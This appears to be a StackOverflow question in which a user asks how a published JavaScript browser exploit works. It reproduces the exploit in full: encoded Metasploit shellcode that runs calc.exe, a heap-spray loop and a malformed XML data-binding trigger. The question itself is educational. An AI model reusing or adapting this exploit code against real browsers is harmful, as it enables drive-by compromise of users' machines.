Databases
StackOverflow2013
Postsdbo
POHelp me understand this JavaScript exploit
Body
 

Note that there are some explanatory texts on larger screens.

plurals
  1. POHelp me understand this JavaScript exploit
    text
    copied!<p>I usually do not have difficulty to read JavaScript script but this one I can't figure out the logic. The code is from an Exploit that has been published 4 days ago. You can find it at <a href="http://www.milw0rm.com/exploits/7477" rel="noreferrer">milw0rm</a>.</p> <p>Here is the code:</p> <pre><code>&lt;html&gt; &lt;div id="replace"&gt;x&lt;/div&gt; &lt;script&gt; // windows/exec - 148 bytes // http://www.metasploit.com // Encoder: x86/shikata_ga_nai // EXITFUNC=process, CMD=calc.exe var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); // ugly heap spray, the d0nkey way! // works most of the time var spray = unescape("%u0a0a%u0a0a"); do { spray += spray; } while(spray.length &lt; 0xd0000); memory = new Array(); for(i = 0; i &lt; 100; i++) memory[i] = spray + shellcode; xmlcode = "&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;image SRC=http://&amp;#x0a0a;&amp;#x0a0a;.example.com&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;XML ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;"; tag = document.getElementById("replace"); tag.innerHTML = xmlcode; &lt;/script&gt; &lt;/html&gt; </code></pre> <p>Here is what I believe it does and I would like you to help me for the part that I misunderstand.</p> <p>The variable <code>shellcode</code> contain the code to open the calc.exe. I do not get it how they have found that weird string... any idea?</p> <p>The second thing is the variable <code>spray</code>. I do not understand this weird loop?</p> <p>The third thing is the variable <code>memory</code> that is never used anywhere, why do they create it?</p> <p>Last thing, What does the XML tag do in the page?</p> <h2>Update</h2> <p>Alright, for the moment I have good answers but mostly very general. I would like more explanations of the value of the code. An example is <code>unescape("%u0a0a%u0a0a");</code>. What does it mean? Same thing for the loop, why did the developer write: <code>length &lt; 0xd0000</code>? I would like a deeper understanding, not only the theory of this code.</p>
 

Querying!

 
Guidance
An individual column

Larger individual text columns get their own page to allow for proper reading.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload